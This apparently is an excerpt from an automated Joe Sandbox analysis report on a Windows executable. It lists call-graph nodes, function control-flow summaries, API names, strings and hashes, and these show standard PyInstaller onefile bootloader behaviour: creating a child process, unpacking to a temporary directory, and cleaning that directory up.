7ff72c6725f0 19940->19943 19944 7ff72c6725fd 19943->19944 19948 7ff72c672642 19943->19948 19949 7ff72c66b224 19944->19949 19950 7ff72c66b235 FlsGetValue 19949->19950 19951 7ff72c66b250 FlsSetValue 19949->19951 19953 7ff72c66b242 19950->19953 19954 7ff72c66b24a 19950->19954 19952 7ff72c66b25d 19951->19952 19951->19953 19956 7ff72c66eb98 memcpy_s 11 API calls 19952->19956 19955 7ff72c66a504 _CreateFrameInfo 45 API calls 19953->19955 19959 7ff72c66b248 19953->19959 19954->19951 19957 7ff72c66b2c5 19955->19957 19958 7ff72c66b26c 19956->19958 19960 7ff72c66b28a FlsSetValue 19958->19960 19961 7ff72c66b27a FlsSetValue 19958->19961 19969 7ff72c6722c4 19959->19969 19963 7ff72c66b2a8 19960->19963 19964 7ff72c66b296 FlsSetValue 19960->19964 19962 7ff72c66b283 19961->19962 19965 7ff72c66a948 __free_lconv_mon 11 API calls 19962->19965 19966 7ff72c66aef4 memcpy_s 11 API calls 19963->19966 19964->19962 19965->19953 19967 7ff72c66b2b0 19966->19967 19968 7ff72c66a948 __free_lconv_mon 11 API calls 19967->19968 19968->19959 19992 7ff72c672534 19969->19992 19971 7ff72c6722f9 20007 7ff72c671fc4 19971->20007 19974 7ff72c672316 19974->19948 19975 7ff72c66d5fc _fread_nolock 12 API calls 19976 7ff72c672327 19975->19976 19977 7ff72c67232f 19976->19977 19979 7ff72c67233e 19976->19979 19978 7ff72c66a948 __free_lconv_mon 11 API calls 19977->19978 19978->19974 19979->19979 20014 7ff72c67266c 19979->20014 19982 7ff72c67243a 19983 7ff72c664f08 memcpy_s 11 API calls 19982->19983 19984 7ff72c67243f 19983->19984 19987 7ff72c66a948 __free_lconv_mon 11 API calls 19984->19987 19985 7ff72c672495 19986 7ff72c6724fc 19985->19986 20025 7ff72c671df4 19985->20025 19990 7ff72c66a948 __free_lconv_mon 11 API calls 19986->19990 19987->19974 19988 7ff72c672454 19988->19985 19991 7ff72c66a948 __free_lconv_mon 11 API calls 19988->19991 19990->19974 19991->19985 19993 7ff72c672557 19992->19993 19994 7ff72c672561 19993->19994 20040 7ff72c6702d8 EnterCriticalSection 19993->20040 19997 7ff72c6725d3 19994->19997 20000 7ff72c66a504 _CreateFrameInfo 45 API calls 19994->20000 19997->19971 20001 7ff72c6725eb 20000->20001 20002 7ff72c672642 20001->20002 20004 7ff72c66b224 50 API calls 20001->20004 20002->19971 20005 7ff72c67262c 20004->20005 20006 7ff72c6722c4 65 API calls 20005->20006 20006->20002 20008 7ff72c664f4c 45 API calls 20007->20008 20009 7ff72c671fd8 20008->20009 20010 7ff72c671ff6 20009->20010 20011 7ff72c671fe4 GetOEMCP 20009->20011 20012 7ff72c67200b 20010->20012 20013 7ff72c671ffb GetACP 20010->20013 20011->20012 20012->19974 20012->19975 20013->20012 20015 7ff72c671fc4 47 API calls 20014->20015 20016 7ff72c672699 20015->20016 20017 7ff72c6727ef 20016->20017 20019 7ff72c6726d6 IsValidCodePage 20016->20019 20023 7ff72c6726f0 memcpy_s 20016->20023 20018 7ff72c65c550 _log10_special 8 API calls 20017->20018 20020 7ff72c672431 20018->20020 20019->20017 20021 7ff72c6726e7 20019->20021 20020->19982 20020->19988 20022 7ff72c672716 GetCPInfo 20021->20022 20021->20023 20022->20017 20022->20023 20041 7ff72c6720dc 20023->20041 20097 7ff72c6702d8 EnterCriticalSection 20025->20097 20042 7ff72c672119 GetCPInfo 20041->20042 20051 7ff72c67220f 20041->20051 20047 7ff72c67212c 20042->20047 20042->20051 20043 7ff72c65c550 _log10_special 8 API calls 20045 7ff72c6722ae 20043->20045 20044 7ff72c672e40 48 API calls 20046 7ff72c6721a3 20044->20046 20045->20017 20052 7ff72c677b84 20046->20052 20047->20044 20050 7ff72c677b84 54 API calls 20050->20051 20051->20043 20053 7ff72c664f4c 45 API calls 20052->20053 20054 7ff72c677ba9 20053->20054 20057 7ff72c677850 20054->20057 20058 7ff72c677891 20057->20058 20059 7ff72c66f8a0 _fread_nolock MultiByteToWideChar 20058->20059 20062 7ff72c6778db 20059->20062 20060 7ff72c677b59 20061 7ff72c65c550 _log10_special 8 API calls 20060->20061 20063 7ff72c6721d6 20061->20063 20062->20060 20064 7ff72c66d5fc _fread_nolock 12 API calls 20062->20064 20065 7ff72c677a11 20062->20065 20067 7ff72c677913 20062->20067 20063->20050 20064->20067 20065->20060 20066 7ff72c66a948 __free_lconv_mon 11 API calls 20065->20066 20066->20060 20067->20065 20068 7ff72c66f8a0 _fread_nolock MultiByteToWideChar 20067->20068 20069 7ff72c677986 20068->20069 20069->20065 20088 7ff72c66f0e4 20069->20088 20072 7ff72c6779d1 20072->20065 20075 7ff72c66f0e4 __crtLCMapStringW 6 API calls 20072->20075 20073 7ff72c677a22 20074 7ff72c66d5fc _fread_nolock 12 API calls 20073->20074 20076 7ff72c677af4 20073->20076 20078 7ff72c677a40 20073->20078 20074->20078 20075->20065 20076->20065 20077 7ff72c66a948 __free_lconv_mon 11 API calls 20076->20077 20077->20065 20078->20065 20079 7ff72c66f0e4 __crtLCMapStringW 6 API calls 20078->20079 20080 7ff72c677ac0 20079->20080 20080->20076 20081 7ff72c677af6 20080->20081 20082 7ff72c677ae0 20080->20082 20084 7ff72c6707e8 WideCharToMultiByte 20081->20084 20083 7ff72c6707e8 WideCharToMultiByte 20082->20083 20085 7ff72c677aee 20083->20085 20084->20085 20085->20076 20086 7ff72c677b0e 20085->20086 20086->20065 20087 7ff72c66a948 __free_lconv_mon 11 API calls 20086->20087 20087->20065 20089 7ff72c66ed10 __crtLCMapStringW 5 API calls 20088->20089 20090 7ff72c66f122 20089->20090 20093 7ff72c66f12a 20090->20093 20094 7ff72c66f1d0 20090->20094 20092 7ff72c66f193 LCMapStringW 20092->20093 20093->20065 20093->20072 20093->20073 20095 7ff72c66ed10 __crtLCMapStringW 5 API calls 20094->20095 20096 7ff72c66f1fe __crtLCMapStringW 20095->20096 20096->20092

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00007FF72C6589E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 0 7ff72c6589e0-7ff72c658b26 call 7ff72c65c850 call 7ff72c659390 SetConsoleCtrlHandler GetStartupInfoW call 7ff72c6653f0 call 7ff72c66a47c call 7ff72c66871c call 7ff72c6653f0 call 7ff72c66a47c call 7ff72c66871c call 7ff72c6653f0 call 7ff72c66a47c call 7ff72c66871c GetCommandLineW CreateProcessW 23 7ff72c658b4d-7ff72c658b89 RegisterClassW 0->23 24 7ff72c658b28-7ff72c658b48 GetLastError call 7ff72c652c50 0->24 26 7ff72c658b8b GetLastError 23->26 27 7ff72c658b91-7ff72c658be5 CreateWindowExW 23->27 31 7ff72c658e39-7ff72c658e5f call 7ff72c65c550 24->31 26->27 29 7ff72c658be7-7ff72c658bed GetLastError 27->29 30 7ff72c658bef-7ff72c658bf4 ShowWindow 27->30 32 7ff72c658bfa-7ff72c658c0a WaitForSingleObject 29->32 30->32 34 7ff72c658c0c 32->34 35 7ff72c658c88-7ff72c658c8f 32->35 39 7ff72c658c10-7ff72c658c13 34->39 36 7ff72c658cd2-7ff72c658cd9 35->36 37 7ff72c658c91-7ff72c658ca1 WaitForSingleObject 35->37 42 7ff72c658dc0-7ff72c658dd9 GetMessageW 36->42 43 7ff72c658cdf-7ff72c658cf5 QueryPerformanceFrequency QueryPerformanceCounter 36->43 40 7ff72c658df8-7ff72c658e02 37->40 41 7ff72c658ca7-7ff72c658cb7 TerminateProcess 37->41 44 7ff72c658c1b-7ff72c658c22 39->44 45 7ff72c658c15 GetLastError 39->45 49 7ff72c658e04-7ff72c658e0a DestroyWindow 40->49 50 7ff72c658e11-7ff72c658e35 GetExitCodeProcess CloseHandle * 2 40->50 51 7ff72c658cb9 GetLastError 41->51 52 7ff72c658cbf-7ff72c658ccd WaitForSingleObject 41->52 47 7ff72c658ddb-7ff72c658de9 TranslateMessage DispatchMessageW 42->47 48 7ff72c658def-7ff72c658df6 42->48 53 7ff72c658d00-7ff72c658d38 MsgWaitForMultipleObjects PeekMessageW 43->53 44->37 46 7ff72c658c24-7ff72c658c41 PeekMessageW 44->46 45->44 54 7ff72c658c43-7ff72c658c74 TranslateMessage DispatchMessageW PeekMessageW 46->54 55 7ff72c658c76-7ff72c658c86 WaitForSingleObject 46->55 47->48 48->40 48->42 49->50 50->31 51->52 52->40 56 7ff72c658d3a 53->56 57 7ff72c658d73-7ff72c658d7a 53->57 54->54 54->55 55->35 55->39 58 7ff72c658d40-7ff72c658d71 TranslateMessage DispatchMessageW PeekMessageW 56->58 57->42 59 7ff72c658d7c-7ff72c658da5 QueryPerformanceCounter 57->59 58->57 58->58 59->53 60 7ff72c658dab-7ff72c658db2 59->60 60->40 61 7ff72c658db4-7ff72c658db8 60->61 61->42
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                  • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                  • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                  • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                  • Instruction ID: aeca1c47379d912acac750598a1b9216697a077a5fed72815e5a2203fa9fd90c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48D19631A08A8386E711AF34EC552ADB7A2FFA47A8F900635DA5D43A94DF3CD149CB10
                                                                                                                                                                                                                                  Function 00007FF72C651000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 62 7ff72c651000-7ff72c653806 call 7ff72c65fe18 call 7ff72c65fe20 call 7ff72c65c850 call 7ff72c6653f0 call 7ff72c665484 call 7ff72c6536b0 76 7ff72c653808-7ff72c65380f 62->76 77 7ff72c653814-7ff72c653836 call 7ff72c651950 62->77 78 7ff72c653c97-7ff72c653cb2 call 7ff72c65c550 76->78 82 7ff72c65391b-7ff72c653931 call 7ff72c6545c0 77->82 83 7ff72c65383c-7ff72c653856 call 7ff72c651c80 77->83 89 7ff72c65396a-7ff72c65397f call 7ff72c652710 82->89 90 7ff72c653933-7ff72c653960 call 7ff72c657f90 82->90 87 7ff72c65385b-7ff72c65389b call 7ff72c658830 83->87 97 7ff72c65389d-7ff72c6538a3 87->97 98 7ff72c6538c1-7ff72c6538cc call 7ff72c664f30 87->98 102 7ff72c653c8f 89->102 100 7ff72c653984-7ff72c6539a6 call 7ff72c651c80 90->100 101 7ff72c653962-7ff72c653965 call 7ff72c66004c 90->101 103 7ff72c6538a5-7ff72c6538ad 97->103 104 7ff72c6538af-7ff72c6538bd call 7ff72c6589a0 97->104 109 7ff72c6539fc-7ff72c653a2a call 7ff72c658940 call 7ff72c6589a0 * 3 98->109 110 7ff72c6538d2-7ff72c6538e1 call 7ff72c658830 98->110 115 7ff72c6539b0-7ff72c6539b9 100->115 101->89 102->78 103->104 104->98 138 7ff72c653a2f-7ff72c653a3e call 7ff72c658830 109->138 119 7ff72c6538e7-7ff72c6538ed 110->119 120 7ff72c6539f4-7ff72c6539f7 call 7ff72c664f30 110->120 115->115 118 7ff72c6539bb-7ff72c6539d8 call 7ff72c651950 115->118 118->87 130 7ff72c6539de-7ff72c6539ef call 7ff72c652710 118->130 124 7ff72c6538f0-7ff72c6538fc 119->124 120->109 127 7ff72c6538fe-7ff72c653903 124->127 128 7ff72c653905-7ff72c653908 124->128 127->124 127->128 128->120 132 7ff72c65390e-7ff72c653916 call 7ff72c664f30 128->132 130->102 132->138 141 7ff72c653a44-7ff72c653a47 138->141 142 7ff72c653b45-7ff72c653b53 138->142 141->142 143 7ff72c653a4d-7ff72c653a50 141->143 144 7ff72c653a67 142->144 145 7ff72c653b59-7ff72c653b5d 142->145 146 7ff72c653b14-7ff72c653b17 143->146 147 7ff72c653a56-7ff72c653a5a 143->147 148 7ff72c653a6b-7ff72c653a90 call 7ff72c664f30 144->148 145->148 150 7ff72c653b19-7ff72c653b1d 146->150 151 7ff72c653b2f-7ff72c653b40 call 7ff72c652710 146->151 147->146 149 7ff72c653a60 147->149 157 7ff72c653aab-7ff72c653ac0 148->157 158 7ff72c653a92-7ff72c653aa6 call 7ff72c658940 148->158 149->144 150->151 153 7ff72c653b1f-7ff72c653b2a 150->153 159 7ff72c653c7f-7ff72c653c87 151->159 153->148 161 7ff72c653be8-7ff72c653bfa call 7ff72c658830 157->161 162 7ff72c653ac6-7ff72c653aca 157->162 158->157 159->102 170 7ff72c653bfc-7ff72c653c02 161->170 171 7ff72c653c2e 161->171 164 7ff72c653bcd-7ff72c653be2 call 7ff72c651940 162->164 165 7ff72c653ad0-7ff72c653ae8 call 7ff72c665250 162->165 164->161 164->162 176 7ff72c653aea-7ff72c653b02 call 7ff72c665250 165->176 177 7ff72c653b62-7ff72c653b7a call 7ff72c665250 165->177 174 7ff72c653c1e-7ff72c653c2c 170->174 175 7ff72c653c04-7ff72c653c1c 170->175 173 7ff72c653c31-7ff72c653c40 call 7ff72c664f30 171->173 185 7ff72c653c46-7ff72c653c4a 173->185 186 7ff72c653d41-7ff72c653d63 call 7ff72c6544e0 173->186 174->173 175->173 176->164 184 7ff72c653b08-7ff72c653b0f 176->184 187 7ff72c653b7c-7ff72c653b80 177->187 188 7ff72c653b87-7ff72c653b9f call 7ff72c665250 177->188 184->164 189 7ff72c653cd4-7ff72c653ce6 call 7ff72c658830 185->189 190 7ff72c653c50-7ff72c653c5f call 7ff72c6590e0 185->190 201 7ff72c653d65-7ff72c653d6f call 7ff72c654630 186->201 202 7ff72c653d71-7ff72c653d82 call 7ff72c651c80 186->202 187->188 197 7ff72c653bac-7ff72c653bc4 call 7ff72c665250 188->197 198 7ff72c653ba1-7ff72c653ba5 188->198 206 7ff72c653ce8-7ff72c653ceb 189->206 207 7ff72c653d35-7ff72c653d3c 189->207 204 7ff72c653cb3-7ff72c653cb6 call 7ff72c658660 190->204 205 7ff72c653c61 190->205 197->164 217 7ff72c653bc6 197->217 198->197 215 7ff72c653d87-7ff72c653d96 201->215 202->215 216 7ff72c653cbb-7ff72c653cbd 204->216 212 7ff72c653c68 call 7ff72c652710 205->212 206->207 213 7ff72c653ced-7ff72c653d10 call 7ff72c651c80 206->213 207->212 225 7ff72c653c6d-7ff72c653c77 212->225 230 7ff72c653d2b-7ff72c653d33 call 7ff72c664f30 213->230 231 7ff72c653d12-7ff72c653d26 call 7ff72c652710 call 7ff72c664f30 213->231 220 7ff72c653d98-7ff72c653d9f 215->220 221 7ff72c653dc4-7ff72c653dda call 7ff72c659390 215->221 223 7ff72c653cc8-7ff72c653ccf 216->223 224 7ff72c653cbf-7ff72c653cc6 216->224 217->164 220->221 227 7ff72c653da1-7ff72c653da5 220->227 233 7ff72c653ddc 221->233 234 7ff72c653de8-7ff72c653e04 SetDllDirectoryW 221->234 223->215 224->212 225->159 227->221 228 7ff72c653da7-7ff72c653dbe SetDllDirectoryW LoadLibraryExW 227->228 228->221 230->215 231->225 233->234 237 7ff72c653e0a-7ff72c653e19 call 7ff72c658830 234->237 238 7ff72c653f01-7ff72c653f08 234->238 251 7ff72c653e1b-7ff72c653e21 237->251 252 7ff72c653e32-7ff72c653e3c call 7ff72c664f30 237->252 240 7ff72c653f0e-7ff72c653f15 238->240 241 7ff72c654008-7ff72c654010 238->241 240->241 245 7ff72c653f1b-7ff72c653f25 call 7ff72c6533c0 240->245 246 7ff72c654035-7ff72c654067 call 7ff72c6536a0 call 7ff72c653360 call 7ff72c653670 call 7ff72c656fc0 call 7ff72c656d70 241->246 247 7ff72c654012-7ff72c65402f PostMessageW GetMessageW 241->247 245->225 258 7ff72c653f2b-7ff72c653f3f call 7ff72c6590c0 245->258 247->246 255 7ff72c653e2d-7ff72c653e2f 251->255 256 7ff72c653e23-7ff72c653e2b 251->256 261 7ff72c653ef2-7ff72c653efc call 7ff72c658940 252->261 262 7ff72c653e42-7ff72c653e48 252->262 255->252 256->255 271 7ff72c653f64-7ff72c653fa0 call 7ff72c658940 call 7ff72c6589e0 call 7ff72c656fc0 call 7ff72c656d70 call 7ff72c6588e0 258->271 272 7ff72c653f41-7ff72c653f5e PostMessageW GetMessageW 258->272 261->238 262->261 266 7ff72c653e4e-7ff72c653e54 262->266 269 7ff72c653e56-7ff72c653e58 266->269 270 7ff72c653e5f-7ff72c653e61 266->270 274 7ff72c653e67-7ff72c653e83 call 7ff72c656dc0 call 7ff72c657340 269->274 275 7ff72c653e5a 269->275 270->238 270->274 306 7ff72c653fa5-7ff72c653fa7 271->306 272->271 290 7ff72c653e8e-7ff72c653e95 274->290 291 7ff72c653e85-7ff72c653e8c 274->291 275->238 294 7ff72c653e97-7ff72c653ea4 call 7ff72c656e00 290->294 295 7ff72c653eaf-7ff72c653eb9 call 7ff72c6571b0 290->295 293 7ff72c653edb-7ff72c653ef0 call 7ff72c652a50 call 7ff72c656fc0 call 7ff72c656d70 291->293 293->238 294->295 308 7ff72c653ea6-7ff72c653ead 294->308 304 7ff72c653ebb-7ff72c653ec2 295->304 305 7ff72c653ec4-7ff72c653ed2 call 7ff72c6574f0 295->305 304->293 305->238 318 7ff72c653ed4 305->318 310 7ff72c653fa9-7ff72c653fbf call 7ff72c658ed0 call 7ff72c6588e0 306->310 311 7ff72c653ff5-7ff72c654003 call 7ff72c651900 306->311 308->293 310->311 323 7ff72c653fc1-7ff72c653fd6 310->323 311->225 318->293 324 7ff72c653fd8-7ff72c653feb call 7ff72c652710 call 7ff72c651900 323->324 325 7ff72c653ff0 call 7ff72c652a50 323->325 324->225 325->311
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                  • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                  • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                  • Opcode ID: 56efb0c328102eab1d406dba677a265d22c75a80e3e063e6a6bdbd0eb2694019
                                                                                                                                                                                                                                  • Instruction ID: 622d26e9a56d379b62f4068e735e4b703384393e3ae7f8cd4b57c91dcd2d8ece
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56efb0c328102eab1d406dba677a265d22c75a80e3e063e6a6bdbd0eb2694019
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49329F21A0C68251FA17F7249C552B9A7A3FF64BE0FE84436DB4D426C6DF2CE558CB20
                                                                                                                                                                                                                                  Function 00007FF72C676964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 538 7ff72c676964-7ff72c6769d7 call 7ff72c676698 541 7ff72c6769d9-7ff72c6769e2 call 7ff72c664ee8 538->541 542 7ff72c6769f1-7ff72c6769fb call 7ff72c668520 538->542 549 7ff72c6769e5-7ff72c6769ec call 7ff72c664f08 541->549 547 7ff72c6769fd-7ff72c676a14 call 7ff72c664ee8 call 7ff72c664f08 542->547 548 7ff72c676a16-7ff72c676a7f CreateFileW 542->548 547->549 551 7ff72c676afc-7ff72c676b07 GetFileType 548->551 552 7ff72c676a81-7ff72c676a87 548->552 560 7ff72c676d32-7ff72c676d52 549->560 555 7ff72c676b09-7ff72c676b44 GetLastError call 7ff72c664e7c CloseHandle 551->555 556 7ff72c676b5a-7ff72c676b61 551->556 558 7ff72c676ac9-7ff72c676af7 GetLastError call 7ff72c664e7c 552->558 559 7ff72c676a89-7ff72c676a8d 552->559 555->549 572 7ff72c676b4a-7ff72c676b55 call 7ff72c664f08 555->572 563 7ff72c676b69-7ff72c676b6c 556->563 564 7ff72c676b63-7ff72c676b67 556->564 558->549 559->558 565 7ff72c676a8f-7ff72c676ac7 CreateFileW 559->565 569 7ff72c676b72-7ff72c676bc7 call 7ff72c668438 563->569 570 7ff72c676b6e 563->570 564->569 565->551 565->558 577 7ff72c676bc9-7ff72c676bd5 call 7ff72c6768a0 569->577 578 7ff72c676be6-7ff72c676c17 call 7ff72c676418 569->578 570->569 572->549 577->578 583 7ff72c676bd7 577->583 584 7ff72c676c1d-7ff72c676c5f 578->584 585 7ff72c676c19-7ff72c676c1b 578->585 586 7ff72c676bd9-7ff72c676be1 call 7ff72c66aac0 583->586 587 7ff72c676c81-7ff72c676c8c 584->587 588 7ff72c676c61-7ff72c676c65 584->588 585->586 586->560 591 7ff72c676c92-7ff72c676c96 587->591 592 7ff72c676d30 587->592 588->587 590 7ff72c676c67-7ff72c676c7c 588->590 590->587 591->592 594 7ff72c676c9c-7ff72c676ce1 CloseHandle CreateFileW 591->594 592->560 595 7ff72c676d16-7ff72c676d2b 594->595 596 7ff72c676ce3-7ff72c676d11 GetLastError call 7ff72c664e7c call 7ff72c668660 594->596 595->592 596->595
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1617910340-0
                                                                                                                                                                                                                                  • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                  • Instruction ID: c9a6c08779169ed6fbac53a333c9f426242b0e566be1c14cde0df1f5ee08c69c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69C10133B28A4285EB11EF64C8812AC7772FB99BA8F910639DE1E57794CF38D015CB10
                                                                                                                                                                                                                                  Function 00007FF72C6583C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C65842B
                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584AE
                                                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584CD
                                                                                                                                                                                                                                  • FindNextFileW.KERNELBASE(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584DB
                                                                                                                                                                                                                                  • FindClose.KERNEL32(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584EC
                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNELBASE(?,00007FF72C658919,00007FF72C653FA5), ref: 00007FF72C6584F5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                  • String ID: %s\*
                                                                                                                                                                                                                                  • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                  • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                  • Instruction ID: acfef818fa757435a00dbfbc73a2c9f3f3a68c5db68a1fd3ca24e20c6487c443
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
